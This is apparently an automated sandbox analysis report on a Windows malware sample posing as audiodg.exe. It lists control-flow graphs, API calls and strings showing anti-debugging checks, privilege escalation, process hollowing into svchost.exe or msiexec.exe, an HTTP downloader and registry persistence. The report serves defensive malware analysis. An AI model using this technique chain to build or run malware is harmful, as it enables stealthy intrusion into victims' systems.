Function_00007FF6FDB53A74 90->107 91 Function_00007FF6FDB5C65C 92 Function_00007FF6FDB5DE59 93 Function_00007FF6FDB5A258 94 Function_00007FF6FDB5EC58 95->24 95->84 97 Function_00007FF6FDB5CF65 98 Function_00007FF6FDB5D365 99 Function_00007FF6FDB5B15F 100 Function_00007FF6FDB5A061 101 Function_00007FF6FDB5D361 102 Function_00007FF6FDB5F26A 103 Function_00007FF6FDB52E6C 104->103 105 Function_00007FF6FDB5C673 106 Function_00007FF6FDB5A772 107->32 107->75 107->78 109 Function_00007FF6FDB5DE70

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 231 7ff6fdb5345c-7ff6fdb53472 call 7ff6fdb510a0 call 7ff6fdb5321c 236 7ff6fdb5347c-7ff6fdb534aa call 7ff6fdb54264 call 7ff6fdb53ce4 call 7ff6fdb53f14 231->236 237 7ff6fdb53474-7ff6fdb53476 ExitProcess 231->237 244 7ff6fdb534fb-7ff6fdb5350e call 7ff6fdb53f14 236->244 245 7ff6fdb534ac-7ff6fdb534bd call 7ff6fdb543a4 236->245 250 7ff6fdb5354c-7ff6fdb5355f call 7ff6fdb53f14 244->250 251 7ff6fdb53510-7ff6fdb53521 call 7ff6fdb543a4 244->251 252 7ff6fdb534d2-7ff6fdb534d4 ExitProcess 245->252 253 7ff6fdb534bf-7ff6fdb534d0 call 7ff6fdb543a4 245->253 263 7ff6fdb535a2-7ff6fdb535b8 call 7ff6fdb53a74 call 7ff6fdb533ec 250->263 264 7ff6fdb53561-7ff6fdb53572 call 7ff6fdb543a4 250->264 260 7ff6fdb5352b call 7ff6fdb5327c 251->260 261 7ff6fdb53523-7ff6fdb53525 ExitProcess 251->261 253->252 262 7ff6fdb534da call 7ff6fdb532ec 253->262 270 7ff6fdb53530-7ff6fdb53535 260->270 272 7ff6fdb534df-7ff6fdb534e4 262->272 283 7ff6fdb535ba-7ff6fdb535cb call 7ff6fdb543a4 263->283 284 7ff6fdb5360e-7ff6fdb536d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 263->284 273 7ff6fdb5357c call 7ff6fdb5327c 264->273 274 7ff6fdb53574-7ff6fdb53576 ExitProcess 264->274 275 7ff6fdb53537-7ff6fdb53542 Sleep 270->275 276 7ff6fdb53544-7ff6fdb53546 ExitProcess 270->276 278 7ff6fdb534e6-7ff6fdb534f1 Sleep 272->278 279 7ff6fdb534f3-7ff6fdb534f5 ExitProcess 272->279 282 7ff6fdb53581-7ff6fdb53586 273->282 275->270 278->272 285 7ff6fdb53588-7ff6fdb53593 Sleep 282->285 286 7ff6fdb53595-7ff6fdb53597 ExitProcess 282->286 289 7ff6fdb535cd-7ff6fdb535de call 7ff6fdb543a4 283->289 290 7ff6fdb535e0-7ff6fdb535e2 ExitProcess 283->290 285->282 289->290 293 7ff6fdb535e8 call 7ff6fdb532ec 289->293 295 7ff6fdb535ed-7ff6fdb535f2 293->295 296 7ff6fdb535f4-7ff6fdb535ff Sleep 295->296 297 7ff6fdb53601-7ff6fdb53603 ExitProcess 295->297 296->295
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                  • Opcode ID: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
                                                                                                                                                                                                  • Instruction ID: 5741f14919dbc38a517b9100250f549e5bcbfc887418d9497c8326ae9bdd82a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F261FBA0A28A4391FB64BF39E85577A2260BF86701FD00135D56EC63E9FE2DF4099790

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction ID: 3b91e29164cfdd9f23c7da708466ea54b238d3d3ce1cc06ea69c5d5626be2ed6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3331187261CA8186E750DF19E45072EB7A0FBC6780F901135FA9E83BA8EF7DE4458B40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction ID: 7877b7b17b76bf2c23d7ce8dd56820ba598e79e44bf180902976b32bc40e3527
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F05450A1D64281E7305F5DE40437927A0AF47B04F900174D5AD867DCFF6DF646DB51

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                                                  • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                  • Instruction ID: 71070020b649b84df40fe84c2726064b40331b0872c1419aa2b053a4adc903cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDF0306590C645C2EB205F24E44577D3360FB97700FA00475D99EC26E8FF2DF4199640

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 328 7ff6fdb51050-7ff6fdb5108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction ID: 550291c656f26af62dcce05c30468ab0e23f553f36acf68fdd78f828bb6ed898
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6E09276608F8086C6209F15F84011AB7B4FBC9794F944225EACD82B28EF3CD165CB00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 329 7ff6fdb53b24-7ff6fdb53b33 330 7ff6fdb53b48-7ff6fdb53b4c 329->330 331 7ff6fdb53b35-7ff6fdb53b42 VirtualFree 329->331 331->330
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                  • Opcode ID: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction ID: 3e62b857e9e90ea811075e2ae46a0e26302d7555cbebfbb06c789e0c46e8b224
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c74ceee972ecbb736572674712f2cdca0c3e821b549de7bb17b5936316a1e88a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05D01351F3494181E795AF16D4457156351FBC5744FC08035D68981698DF3CD0958F00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 332 7ff6fdb52048-7ff6fdb520c2 GetModuleFileNameW 333 7ff6fdb520c9-7ff6fdb52105 332->333 334 7ff6fdb520c4 332->334 336 7ff6fdb5211d-7ff6fdb52139 call 7ff6fdb51f88 333->336 337 7ff6fdb52107-7ff6fdb5210f 333->337 335 7ff6fdb5296d-7ff6fdb52975 334->335 346 7ff6fdb5217c-7ff6fdb52186 336->346 339 7ff6fdb5213b-7ff6fdb52157 call 7ff6fdb51fc8 337->339 340 7ff6fdb52111-7ff6fdb52119 337->340 339->346 343 7ff6fdb5211b-7ff6fdb52177 340->343 344 7ff6fdb52159-7ff6fdb52175 call 7ff6fdb52008 340->344 343->335 344->346 350 7ff6fdb5218d-7ff6fdb521e1 CreateProcessW 346->350 351 7ff6fdb52188 346->351 352 7ff6fdb521e8-7ff6fdb52228 CreateFileW 350->352 353 7ff6fdb521e3 350->353 351->335 354 7ff6fdb5222a 352->354 355 7ff6fdb5222f-7ff6fdb5224b GetFileSize 352->355 353->335 354->335 356 7ff6fdb5224d-7ff6fdb52255 355->356 357 7ff6fdb52257-7ff6fdb52262 CloseHandle 355->357 356->357 358 7ff6fdb52267-7ff6fdb5228f VirtualAlloc 356->358 357->335 359 7ff6fdb522a1-7ff6fdb522cc ReadFile 358->359 360 7ff6fdb52291-7ff6fdb5229c CloseHandle 358->360 361 7ff6fdb522ce-7ff6fdb522ec VirtualFree CloseHandle 359->361 362 7ff6fdb522f1-7ff6fdb5233f CloseHandle GetThreadContext 359->362 360->335 361->335 363 7ff6fdb52359-7ff6fdb523de ReadProcessMemory GetModuleHandleA GetProcAddress 362->363 364 7ff6fdb52341-7ff6fdb52354 VirtualFree 362->364 366 7ff6fdb523f8-7ff6fdb52461 VirtualAllocEx 363->366 367 7ff6fdb523e0-7ff6fdb523f3 VirtualFree 363->367 364->335 368 7ff6fdb5247b-7ff6fdb524af WriteProcessMemory 366->368 369 7ff6fdb52463-7ff6fdb52476 VirtualFree 366->369 367->335 370 7ff6fdb524c9-7ff6fdb524d4 368->370 371 7ff6fdb524b1-7ff6fdb524c4 VirtualFree 368->371 369->335 372 7ff6fdb524e6-7ff6fdb524f9 370->372 371->335 373 7ff6fdb525a7-7ff6fdb525ee 372->373 374 7ff6fdb524ff-7ff6fdb52588 WriteProcessMemory 372->374 377 7ff6fdb52600-7ff6fdb52613 373->377 375 7ff6fdb5258a-7ff6fdb5259d VirtualFree 374->375 376 7ff6fdb525a2 374->376 375->335 376->372 379 7ff6fdb52898-7ff6fdb5291c WriteProcessMemory SetThreadContext 377->379 380 7ff6fdb52619-7ff6fdb52668 RtlCompareMemory 377->380 381 7ff6fdb52933-7ff6fdb52943 ResumeThread 379->381 382 7ff6fdb5291e-7ff6fdb52931 VirtualFree 379->382 383 7ff6fdb5266a 380->383 384 7ff6fdb5266c-7ff6fdb52695 380->384 386 7ff6fdb5295a-7ff6fdb52967 VirtualFree 381->386 387 7ff6fdb52945-7ff6fdb52958 VirtualFree 381->387 382->335 383->377 388 7ff6fdb526a0-7ff6fdb526ae 384->388 386->335 387->335 389 7ff6fdb52893 388->389 390 7ff6fdb526b4-7ff6fdb5273f 388->390 389->379 391 7ff6fdb52751-7ff6fdb5275f 390->391 392 7ff6fdb52765-7ff6fdb52798 391->392 393 7ff6fdb5288e 391->393 394 7ff6fdb5279a 392->394 395 7ff6fdb5279c-7ff6fdb5286f ReadProcessMemory WriteProcessMemory 392->395 393->388 394->391 397 7ff6fdb52889 395->397 398 7ff6fdb52871-7ff6fdb52884 VirtualFree 395->398 397->393 398->335
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                                                                  • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                  • API String ID: 514040917-3001742581
                                                                                                                                                                                                  • Opcode ID: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction ID: 11ff7e894276d72770412e8bbcd9d7de494a8daf469ccc358b9f0379e5c7d708
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 020606dac09714d876f732298f71c3bfad47b6361a535e3c1c12f93051d4a690
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB32C972709AC186E774CF19E8547AAB3A1FBCAB44F404135DA9D83B98EF7CE4458B40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpenToken$AdjustCurrentLookupObjectPrivilegePrivilegesSingleValueWait
                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                  • API String ID: 2379135442-2896544425
                                                                                                                                                                                                  • Opcode ID: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction ID: f7f6487e070bc283eef0bd263fa1c2bc4d8c3722f7bafd9df37da4b938afaa20
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6555fb06984b99f5dc155d762adf927f354496d136c17024d6a4529462c8518f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87415E7261868186E350CF55F44876AB7B0FB86754F904134EA9987A9CEF7DE448CF80
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Virtual$AllocMemoryProcessProtectWrite
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 4073123320-2766056989
                                                                                                                                                                                                  • Opcode ID: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction ID: 8802fc99b6294f230e67ae0f26c8745e1376af14598a58f322e659a9fe9c8a79
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3439f0f28ca5504b0ff3065ed7b98b6ad7e1e81e5eec6f55742a1d8705483ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6641C47260DA8586E770CF19F85436AB7A0F786B84F504025EADD83B98EF7DE4548B80

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF6FDB51D19
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                  • API String ID: 2307068205-2771526726
                                                                                                                                                                                                  • Opcode ID: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction ID: 7661dfc938f8ada60a79021c2789d5e32073673d8576e64d651a58658be4fb43
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d6439b4b7b4c33b889769c58a8dd001a4713a0aee7d85e729a6ddd97db8bc66
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F171FD76A18A41C2E7508F59F45432AB760FBC6795F901035FA9E83AACEF7DE444CB40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateHandleProcessSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2693768547-0
                                                                                                                                                                                                  • Opcode ID: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction ID: 63111283cc8a5e858a568b40b47b83b88c7656047511d31d95ae10bc4c94f7f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e31ffde3c8b45f3337ce6ae119efcfc5e37158fb3e9376a1b8de9c2123a5d47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE81E576608B8186DB50CF59F44536AB7A0FBCAB91F504135EA9D83BA8EF7CE4448B40

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB545C4: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53117), ref: 00007FF6FDB5460C
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB545C4: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53117), ref: 00007FF6FDB54649
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB545C4: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB53117), ref: 00007FF6FDB54654
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53B84: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FDB5311C), ref: 00007FF6FDB53BC7
                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB53B84: RegSetValueExW.ADVAPI32 ref: 00007FF6FDB53BFD
